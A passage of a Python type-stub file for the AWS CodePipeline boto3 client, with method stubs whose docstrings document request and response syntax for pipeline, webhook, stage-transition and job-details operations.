The type of the artifact store, such as S3.
- **location** *(string) --* **[REQUIRED]**
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --* **[REQUIRED]**
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --* **[REQUIRED]**
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to \'KMS\'.
- **artifactStores** *(dict) --*
A mapping of artifactStore objects and their corresponding regions. There must be an artifact store for the pipeline region and for each cross-region action within the pipeline. You can only use either artifactStore or artifactStores, not both.
If you create a cross-region action in your pipeline, you must use artifactStores.
- *(string) --*
- *(dict) --*
The Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --* **[REQUIRED]**
The type of the artifact store, such as S3.
- **location** *(string) --* **[REQUIRED]**
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --* **[REQUIRED]**
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --* **[REQUIRED]**
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to \'KMS\'.
- **stages** *(list) --* **[REQUIRED]**
The stage in which to perform the action.
- *(dict) --*
Represents information about a stage and its definition.
- **name** *(string) --* **[REQUIRED]**
The name of the stage.
- **blockers** *(list) --*
Reserved for future use.
- *(dict) --*
Reserved for future use.
- **name** *(string) --* **[REQUIRED]**
Reserved for future use.
- **type** *(string) --* **[REQUIRED]**
Reserved for future use.
- **actions** *(list) --* **[REQUIRED]**
The actions included in a stage.
- *(dict) --*
Represents information about an action declaration.
- **name** *(string) --* **[REQUIRED]**
The action declaration\'s name.
- **actionTypeId** *(dict) --* **[REQUIRED]**
The configuration information for the action type.
- **category** *(string) --* **[REQUIRED]**
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --* **[REQUIRED]**
The creator of the action being called.
- **provider** *(string) --* **[REQUIRED]**
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --* **[REQUIRED]**
A string that describes the action version.
- **runOrder** *(integer) --*
The order in which actions are run.
- **configuration** *(dict) --*
The action declaration\'s configuration.
- *(string) --*
- *(string) --*
- **outputArtifacts** *(list) --*
The name or ID of the result of the action declaration, such as a test or build artifact.
- *(dict) --*
Represents information about the output of an action.
- **name** *(string) --* **[REQUIRED]**
The name of the output of an artifact, such as \"My App\".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
Output artifact names must be unique within a pipeline.
- **inputArtifacts** *(list) --*
The name or ID of the artifact consumed by the action, such as a test or build artifact.
- *(dict) --*
Represents information about an artifact to be worked on, such as a test or build artifact.
- **name** *(string) --* **[REQUIRED]**
The name of the artifact to be worked on, for example, \"My App\".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
- **roleArn** *(string) --*
The ARN of the IAM service role that will perform the declared action. This is assumed through the roleArn for the pipeline.
- **region** *(string) --*
The action declaration\'s AWS Region, such as us-east-1.
- **version** *(integer) --*
The version number of the pipeline. A new pipeline always has a version number of 1. This number is automatically incremented when a pipeline is updated.
:rtype: dict
:returns:
"""
pass
def delete_custom_action_type(self, category: str, provider: str, version: str):
"""
Marks a custom action as deleted. PollForJobs for the custom action will fail after the action is marked for deletion. Only used for custom actions.
.. warning::
To re-create a custom action after it has been deleted you must use a string in the version field that has never been used before. This string can be an incremented version number, for example. To restore a deleted custom action, use a JSON file that is identical to the deleted action, including the original string in the version field.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/DeleteCustomActionType>`_
**Request Syntax**
::
response = client.delete_custom_action_type(
category='Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
provider='string',
version='string'
)
:type category: string
:param category: **[REQUIRED]**
The category of the custom action that you want to delete, such as source or deploy.
:type provider: string
:param provider: **[REQUIRED]**
The provider of the service used in the custom action, such as AWS CodeDeploy.
:type version: string
:param version: **[REQUIRED]**
The version of the custom action to delete.
:returns: None
"""
pass
def delete_pipeline(self, name: str):
"""
Deletes the specified pipeline.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/DeletePipeline>`_
**Request Syntax**
::
response = client.delete_pipeline(
name='string'
)
:type name: string
:param name: **[REQUIRED]**
The name of the pipeline to be deleted.
:returns: None
"""
pass
def delete_webhook(self, name: str) -> Dict:
"""
Deletes a previously created webhook by name. Deleting the webhook stops AWS CodePipeline from starting a pipeline every time an external event occurs. The API will return successfully when trying to delete a webhook that is already deleted. If a deleted webhook is re-created by calling PutWebhook with the same name, it will have a different URL.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/DeleteWebhook>`_
**Request Syntax**
::
response = client.delete_webhook(
name='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type name: string
:param name: **[REQUIRED]**
The name of the webhook you want to delete.
:rtype: dict
:returns:
"""
pass
def deregister_webhook_with_third_party(self, webhookName: str = None) -> Dict:
"""
Removes the connection between the webhook that was created by CodePipeline and the external tool with events to be detected. Currently only supported for webhooks that target an action type of GitHub.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/DeregisterWebhookWithThirdParty>`_
**Request Syntax**
::
response = client.deregister_webhook_with_third_party(
webhookName='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type webhookName: string
:param webhookName:
The name of the webhook you want to deregister.
:rtype: dict
:returns:
"""
pass
def disable_stage_transition(self, pipelineName: str, stageName: str, transitionType: str, reason: str):
"""
Prevents artifacts in a pipeline from transitioning to the next stage in the pipeline.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/DisableStageTransition>`_
**Request Syntax**
::
response = client.disable_stage_transition(
pipelineName='string',
stageName='string',
transitionType='Inbound'|'Outbound',
reason='string'
)
:type pipelineName: string
:param pipelineName: **[REQUIRED]**
The name of the pipeline in which you want to disable the flow of artifacts from one stage to another.
:type stageName: string
:param stageName: **[REQUIRED]**
The name of the stage where you want to disable the inbound or outbound transition of artifacts.
:type transitionType: string
:param transitionType: **[REQUIRED]**
Specifies whether artifacts will be prevented from transitioning into the stage and being processed by the actions in that stage (inbound), or prevented from transitioning from the stage after they have been processed by the actions in that stage (outbound).
:type reason: string
:param reason: **[REQUIRED]**
The reason given to the user why a stage is disabled, such as waiting for manual approval or manual tests. This message is displayed in the pipeline console UI.
:returns: None
"""
pass
def enable_stage_transition(self, pipelineName: str, stageName: str, transitionType: str):
"""
Enables artifacts in a pipeline to transition to a stage in a pipeline.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/EnableStageTransition>`_
**Request Syntax**
::
response = client.enable_stage_transition(
pipelineName='string',
stageName='string',
transitionType='Inbound'|'Outbound'
)
:type pipelineName: string
:param pipelineName: **[REQUIRED]**
The name of the pipeline in which you want to enable the flow of artifacts from one stage to another.
:type stageName: string
:param stageName: **[REQUIRED]**
The name of the stage where you want to enable the transition of artifacts, either into the stage (inbound) or from that stage to the next stage (outbound).
:type transitionType: string
:param transitionType: **[REQUIRED]**
Specifies whether artifacts will be allowed to enter the stage and be processed by the actions in that stage (inbound) or whether already-processed artifacts will be allowed to transition to the next stage (outbound).
:returns: None
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
"""
pass
def get_job_details(self, jobId: str) -> Dict:
"""
Returns information about a job. Only used for custom actions.
.. warning::
When this API is called, AWS CodePipeline returns temporary credentials for the Amazon S3 bucket used to store artifacts for the pipeline, if the action requires access to that Amazon S3 bucket for input or output artifacts. Additionally, this API returns any secret values defined for the action.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/GetJobDetails>`_
**Request Syntax**
::
response = client.get_job_details(
jobId='string'
)
**Response Syntax**
::
{
'jobDetails': {
'id': 'string',
'data': {
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'actionConfiguration': {
'configuration': {
'string': 'string'
}
},
'pipelineContext': {
'pipelineName': 'string',
'stage': {
'name': 'string'
},
'action': {
'name': 'string',
'actionExecutionId': 'string'
},
'pipelineArn': 'string',
'pipelineExecutionId': 'string'
},
'inputArtifacts': [
{
'name': 'string',
'revision': 'string',
'location': {
'type': 'S3',
's3Location': {
'bucketName': 'string',
'objectKey': 'string'
}
}
},
],
'outputArtifacts': [
{
'name': 'string',
'revision': 'string',
'location': {
'type': 'S3',
's3Location': {
'bucketName': 'string',
'objectKey': 'string'
}
}
},
],
'artifactCredentials': {
'accessKeyId': 'string',
'secretAccessKey': 'string',
'sessionToken': 'string'
},
'continuationToken': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'accountId': 'string'
}
}
**Response Structure**
- *(dict) --*
Represents the output of a GetJobDetails action.
- **jobDetails** *(dict) --*
The details of the job.
.. note::
If AWSSessionCredentials is used, a long-running job can call GetJobDetails again to obtain new credentials.
- **id** *(string) --*
The unique system-generated ID of the job.
- **data** *(dict) --*
Represents additional information about a job required for a job worker to complete the job.
- **actionTypeId** *(dict) --*
Represents information about an action type.
- **category** *(string) --*
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --*
The creator of the action being called.
- **provider** *(string) --*
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --*
A string that describes the action version.
- **actionConfiguration** *(dict) --*
Represents information about an action configuration.
- **configuration** *(dict) --*
The configuration data for the action.
- *(string) --*
- *(string) --*
- **pipelineContext** *(dict) --*
Represents information about a pipeline to a job worker.
.. note::
Includes ``pipelineArn`` and ``pipelineExecutionId`` for Custom jobs.
- **pipelineName** *(string) --*
The name of the pipeline. This is a user-specified value. Pipeline names must be unique across all pipeline names under an Amazon Web Services account.
- **stage** *(dict) --*
The stage of the pipeline.
- **name** *(string) --*
The name of the stage.
- **action** *(dict) --*
The context of an action to a job worker within the stage of a pipeline.
- **name** *(string) --*
The name of the action within the context of a job.
- **actionExecutionId** *(string) --*
The system-generated unique ID that corresponds to an action's execution.
- **pipelineArn** *(string) --*
The pipeline execution ID provided to the job worker.
- **pipelineExecutionId** *(string) --*
The pipeline Amazon Resource Name (ARN) provided to the job worker.
- **inputArtifacts** *(list) --*
The artifact supplied to the job.
- *(dict) --*
Represents information about an artifact that will be worked upon by actions in the pipeline.
- **name** *(string) --*
The artifact's name.
- **revision** *(string) --*
The artifact's revision ID. Depending on the type of object, this could be a commit ID (GitHub) or a revision ID (Amazon S3).
- **location** *(dict) --*
The location of an artifact.
- **type** *(string) --*
The type of artifact in the location.
- **s3Location** *(dict) --*
The Amazon S3 bucket that contains the artifact.
- **bucketName** *(string) --*
The name of the Amazon S3 bucket.
- **objectKey** *(string) --*
The key of the object in the Amazon S3 bucket, which uniquely identifies the object in the bucket.
- **outputArtifacts** *(list) --*
The output of the job.
- *(dict) --*
Represents information about an artifact that will be worked upon by actions in the pipeline.
- **name** *(string) --*
The artifact's name.
- **revision** *(string) --*
The artifact's revision ID. Depending on the type of object, this could be a commit ID (GitHub) or a revision ID (Amazon S3).
- **location** *(dict) --*
The location of an artifact.
- **type** *(string) --*
The type of artifact in the location.
- **s3Location** *(dict) --*
The Amazon S3 bucket that contains the artifact.
- **bucketName** *(string) --*
The name of the Amazon S3 bucket.
- **objectKey** *(string) --*
The key of the object in the Amazon S3 bucket, which uniquely identifies the object in the bucket.
- **artifactCredentials** *(dict) --*
Represents an AWS session credentials object. These credentials are temporary credentials that are issued by AWS Secure Token Service (STS). They can be used to access input and output artifacts in the Amazon S3 bucket used to store artifact for the pipeline in AWS CodePipeline.
- **accessKeyId** *(string) --*
The access key for the session.
- **secretAccessKey** *(string) --*
The secret access key for the session.
- **sessionToken** *(string) --*
The token for the session.
- **continuationToken** *(string) --*
A system-generated token, such as a AWS CodeDeploy deployment ID, that a job requires in order to continue the job asynchronously.
- **encryptionKey** *(dict) --*
Represents information about the key used to encrypt data in the artifact store, such as an AWS Key Management Service (AWS KMS) key.
- **id** *(string) --*
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --*
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
- **accountId** *(string) --*
The AWS account ID associated with the job.
:type jobId: string
:param jobId: **[REQUIRED]**
The unique system-generated ID for the job.
:rtype: dict
:returns:
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_pipeline(self, name: str, version: int = None) -> Dict:
"""
Returns the metadata, structure, stages, and actions of a pipeline. Can be used to return the entire structure of a pipeline in JSON format, which can then be modified and used to update the pipeline structure with UpdatePipeline .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/GetPipeline>`_
**Request Syntax**
::
response = client.get_pipeline(
name='string',
version=123
)
**Response Syntax**
::
{
'pipeline': {
'name': 'string',
'roleArn': 'string',
'artifactStore': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'artifactStores': {
'string': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
}
},
'stages': [
{
'name': 'string',
'blockers': [
{
'name': 'string',
'type': 'Schedule'
},
],
'actions': [
{
'name': 'string',
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'runOrder': 123,
'configuration': {
'string': 'string'
},
'outputArtifacts': [
{
'name': 'string'
},
],
'inputArtifacts': [
{
'name': 'string'
},
],
'roleArn': 'string',
'region': 'string'
},
]
},
],
'version': 123
},
'metadata': {
'pipelineArn': 'string',
'created': datetime(2015, 1, 1),
'updated': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
Represents the output of a GetPipeline action.
- **pipeline** *(dict) --*
Represents the structure of actions and stages to be performed in the pipeline.
- **name** *(string) --*
The name of the action to be performed.
- **roleArn** *(string) --*
The Amazon Resource Name (ARN) for AWS CodePipeline to use to either perform actions with no actionRoleArn, or to use to assume roles for actions with an actionRoleArn.
- **artifactStore** *(dict) --*
Represents information about the Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --*
The type of the artifact store, such as S3.
- **location** *(string) --*
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --*
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --*
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
- **artifactStores** *(dict) --*
A mapping of artifactStore objects and their corresponding regions. There must be an artifact store for the pipeline region and for each cross-region action within the pipeline. You can only use either artifactStore or artifactStores, not both.
If you create a cross-region action in your pipeline, you must use artifactStores.
- *(string) --*
- *(dict) --*
The Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --*
The type of the artifact store, such as S3.
- **location** *(string) --*
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --*
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --*
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
- **stages** *(list) --*
The stage in which to perform the action.
- *(dict) --*
Represents information about a stage and its definition.
- **name** *(string) --*
The name of the stage.
- **blockers** *(list) --*
Reserved for future use.
- *(dict) --*
Reserved for future use.
- **name** *(string) --*
Reserved for future use.
- **type** *(string) --*
Reserved for future use.
- **actions** *(list) --*
The actions included in a stage.
- *(dict) --*
Represents information about an action declaration.
- **name** *(string) --*
The action declaration's name.
- **actionTypeId** *(dict) --*
The configuration information for the action type.
- **category** *(string) --*
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --*
The creator of the action being called.
- **provider** *(string) --*
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --*
A string that describes the action version.
- **runOrder** *(integer) --*
The order in which actions are run.
- **configuration** *(dict) --*
The action declaration's configuration.
- *(string) --*
- *(string) --*
- **outputArtifacts** *(list) --*
The name or ID of the result of the action declaration, such as a test or build artifact.
- *(dict) --*
Represents information about the output of an action.
- **name** *(string) --*
The name of the output of an artifact, such as "My App".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
Output artifact names must be unique within a pipeline.
- **inputArtifacts** *(list) --*
The name or ID of the artifact consumed by the action, such as a test or build artifact.
- *(dict) --*
Represents information about an artifact to be worked on, such as a test or build artifact.
- **name** *(string) --*
The name of the artifact to be worked on, for example, "My App".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
- **roleArn** *(string) --*
The ARN of the IAM service role that will perform the declared action. This is assumed through the roleArn for the pipeline.
- **region** *(string) --*
The action declaration's AWS Region, such as us-east-1.
- **version** *(integer) --*
The version number of the pipeline. A new pipeline always has a version number of 1. This number is automatically incremented when a pipeline is updated.
- **metadata** *(dict) --*
Represents the pipeline metadata information returned as part of the output of a GetPipeline action.
- **pipelineArn** *(string) --*
The Amazon Resource Name (ARN) of the pipeline.
- **created** *(datetime) --*
The date and time the pipeline was created, in timestamp format.
- **updated** *(datetime) --*
The date and time the pipeline was last updated, in timestamp format.
:type name: string
:param name: **[REQUIRED]**
The name of the pipeline for which you want to get information. Pipeline names must be unique under an Amazon Web Services (AWS) user account.
:type version: integer
:param version:
The version number of the pipeline. If you do not specify a version, defaults to the most current version.
:rtype: dict
:returns:
"""
pass
def get_pipeline_execution(self, pipelineName: str, pipelineExecutionId: str) -> Dict:
"""
Returns information about an execution of a pipeline, including details about artifacts, the pipeline execution ID, and the name, version, and status of the pipeline.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/GetPipelineExecution>`_
**Request Syntax**
::
response = client.get_pipeline_execution(
pipelineName='string',
pipelineExecutionId='string'
)
**Response Syntax**
::
{
'pipelineExecution': {
'pipelineName': 'string',
'pipelineVersion': 123,
'pipelineExecutionId': 'string',
'status': 'InProgress'|'Succeeded'|'Superseded'|'Failed',
'artifactRevisions': [
{
'name': 'string',
'revisionId': 'string',
'revisionChangeIdentifier': 'string',
'revisionSummary': 'string',
'created': datetime(2015, 1, 1),
'revisionUrl': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
Represents the output of a GetPipelineExecution action.
- **pipelineExecution** *(dict) --*
Represents information about the execution of a pipeline.
- **pipelineName** *(string) --*
The name of the pipeline that was executed.
- **pipelineVersion** *(integer) --*
The version number of the pipeline that was executed.
- **pipelineExecutionId** *(string) --*
The ID of the pipeline execution.
- **status** *(string) --*
The status of the pipeline execution.
* InProgress: The pipeline execution is currently running.
* Succeeded: The pipeline execution was completed successfully.
* Superseded: While this pipeline execution was waiting for the next stage to be completed, a newer pipeline execution advanced and continued through the pipeline instead.
* Failed: The pipeline execution was not completed successfully.
- **artifactRevisions** *(list) --*
A list of ArtifactRevision objects included in a pipeline execution.
- *(dict) --*
Represents revision details of an artifact.
- **name** *(string) --*
The name of an artifact. This name might be system-generated, such as "MyApp", or might be defined by the user when an action is created.
- **revisionId** *(string) --*
The revision ID of the artifact.
- **revisionChangeIdentifier** *(string) --*
An additional identifier for a revision, such as a commit date or, for artifacts stored in Amazon S3 buckets, the ETag value.
- **revisionSummary** *(string) --*
Summary information about the most recent revision of the artifact. For GitHub and AWS CodeCommit repositories, the commit message. For Amazon S3 buckets or actions, the user-provided content of a ``codepipeline-artifact-revision-summary`` key specified in the object metadata.
- **created** *(datetime) --*
The date and time when the most recent revision of the artifact was created, in timestamp format.
- **revisionUrl** *(string) --*
The commit ID for the artifact revision. For artifacts stored in GitHub or AWS CodeCommit repositories, the commit ID is linked to a commit details page.
:type pipelineName: string
:param pipelineName: **[REQUIRED]**
The name of the pipeline about which you want to get execution details.
:type pipelineExecutionId: string
:param pipelineExecutionId: **[REQUIRED]**
The ID of the pipeline execution about which you want to get execution details.
:rtype: dict
:returns:
"""
pass
def get_pipeline_state(self, name: str) -> Dict:
"""
Returns information about the state of a pipeline, including the stages and actions.
.. note::
Values returned in the revisionId and revisionUrl fields indicate the source revision information, such as the commit ID, for the current state.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/GetPipelineState>`_
**Request Syntax**
::
response = client.get_pipeline_state(
name='string'
)
**Response Syntax**
::
{
'pipelineName': 'string',
'pipelineVersion': 123,
'stageStates': [
{
'stageName': 'string',
'inboundTransitionState': {
'enabled': True|False,
'lastChangedBy': 'string',
'lastChangedAt': datetime(2015, 1, 1),
'disabledReason': 'string'
},
'actionStates': [
{
'actionName': 'string',
'currentRevision': {
'revisionId': 'string',
'revisionChangeId': 'string',
'created': datetime(2015, 1, 1)
},
'latestExecution': {
'status': 'InProgress'|'Succeeded'|'Failed',
'summary': 'string',
'lastStatusChange': datetime(2015, 1, 1),
'token': 'string',
'lastUpdatedBy': 'string',
'externalExecutionId': 'string',
'externalExecutionUrl': 'string',
'percentComplete': 123,
'errorDetails': {
'code': 'string',
'message': 'string'
}
},
'entityUrl': 'string',
'revisionUrl': 'string'
},
],
'latestExecution': {
'pipelineExecutionId': 'string',
'status': 'InProgress'|'Failed'|'Succeeded'
}
},
],
'created': datetime(2015, 1, 1),
'updated': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
Represents the output of a GetPipelineState action.
- **pipelineName** *(string) --*
The name of the pipeline for which you want to get the state.
- **pipelineVersion** *(integer) --*
The version number of the pipeline.
.. note::
A newly-created pipeline is always assigned a version number of ``1`` .
- **stageStates** *(list) --*
A list of the pipeline stage output information, including stage name, state, most recent run details, whether the stage is disabled, and other data.
- *(dict) --*
Represents information about the state of the stage.
- **stageName** *(string) --*
The name of the stage.
- **inboundTransitionState** *(dict) --*
The state of the inbound transition, which is either enabled or disabled.
- **enabled** *(boolean) --*
Whether the transition between stages is enabled (true) or disabled (false).
- **lastChangedBy** *(string) --*
The ID of the user who last changed the transition state.
- **lastChangedAt** *(datetime) --*
The timestamp when the transition state was last changed.
- **disabledReason** *(string) --*
The user-specified reason why the transition between two stages of a pipeline was disabled.
- **actionStates** *(list) --*
The state of the stage.
- *(dict) --*
Represents information about the state of an action.
- **actionName** *(string) --*
The name of the action.
- **currentRevision** *(dict) --*
Represents information about the version (or revision) of an action.
- **revisionId** *(string) --*
The system-generated unique ID that identifies the revision number of the action.
- **revisionChangeId** *(string) --*
The unique identifier of the change that set the state to this revision, for example a deployment ID or timestamp.
- **created** *(datetime) --*
The date and time when the most recent version of the action was created, in timestamp format.
- **latestExecution** *(dict) --*
Represents information about the run of an action.
- **status** *(string) --*
The status of the action, or for a completed action, the last status of the action.
- **summary** *(string) --*
A summary of the run of the action.
- **lastStatusChange** *(datetime) --*
The last status change of the action.
- **token** *(string) --*
The system-generated token used to identify a unique approval request. The token for each open approval request can be obtained using the GetPipelineState command and is used to validate that the approval request corresponding to this token is still valid.
- **lastUpdatedBy** *(string) --*
The ARN of the user who last changed the pipeline.
- **externalExecutionId** *(string) --*
The external ID of the run of the action.
- **externalExecutionUrl** *(string) --*
The URL of a resource external to AWS that will be used when running the action, for example an external repository URL.
- **percentComplete** *(integer) --*
A percentage of completeness of the action as it runs.
- **errorDetails** *(dict) --*
The details of an error returned by a URL external to AWS.
- **code** *(string) --*
The system ID or error number code of the error.
- **message** *(string) --*
The text of the error message.
- **entityUrl** *(string) --*
A URL link for more information about the state of the action, such as a deployment group details page.
- **revisionUrl** *(string) --*
A URL link for more information about the revision, such as a commit details page.
- **latestExecution** *(dict) --*
Information about the latest execution in the stage, including its ID and status.
- **pipelineExecutionId** *(string) --*
The ID of the pipeline execution associated with the stage.
- **status** *(string) --*
The status of the stage, or for a completed stage, the last status of the stage.
- **created** *(datetime) --*
The date and time the pipeline was created, in timestamp format.
- **updated** *(datetime) --*
The date and time the pipeline was last updated, in timestamp format.
:type name: string
:param name: **[REQUIRED]**
The name of the pipeline about which you want to get information.
:rtype: dict
:returns:
"""
pass
def get_third_party_job_details(self, jobId: str, clientToken: str) -> Dict:
"""
Requests the details of a job for a third party action. Only used for partner actions.
.. warning::
When this API is called, AWS CodePipeline returns temporary credentials for the Amazon S3 bucket used to store artifacts for the pipeline, if the action requires access to that Amazon S3 bucket for input or output artifacts. Additionally, this API returns any secret values defined for the action.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/GetThirdPartyJobDetails>`_
**Request Syntax**
::
response = client.get_third_party_job_details(
jobId='string',
clientToken='string'
)
**Response Syntax**
::
{
'jobDetails': {
'id': 'string',
'data': {
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'actionConfiguration': {
'configuration': {
'string': 'string'
}
},
'pipelineContext': {
'pipelineName': 'string',
'stage': {
'name': 'string'
},
'action': {
'name': 'string',
'actionExecutionId': 'string'
},
'pipelineArn': 'string',
'pipelineExecutionId': 'string'
},
'inputArtifacts': [
{
'name': 'string',
'revision': 'string',
'location': {
'type': 'S3',
's3Location': {
'bucketName': 'string',
'objectKey': 'string'
}
}
},
],
'outputArtifacts': [
{
'name': 'string',
'revision': 'string',
'location': {
'type': 'S3',
's3Location': {
'bucketName': 'string',
'objectKey': 'string'
}
}
},
],
'artifactCredentials': {
'accessKeyId': 'string',
'secretAccessKey': 'string',
'sessionToken': 'string'
},
'continuationToken': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'nonce': 'string'
}
}
**Response Structure**
- *(dict) --*
Represents the output of a GetThirdPartyJobDetails action.
- **jobDetails** *(dict) --*
The details of the job, including any protected values defined for the job.
- **id** *(string) --*
The identifier used to identify the job details in AWS CodePipeline.
- **data** *(dict) --*
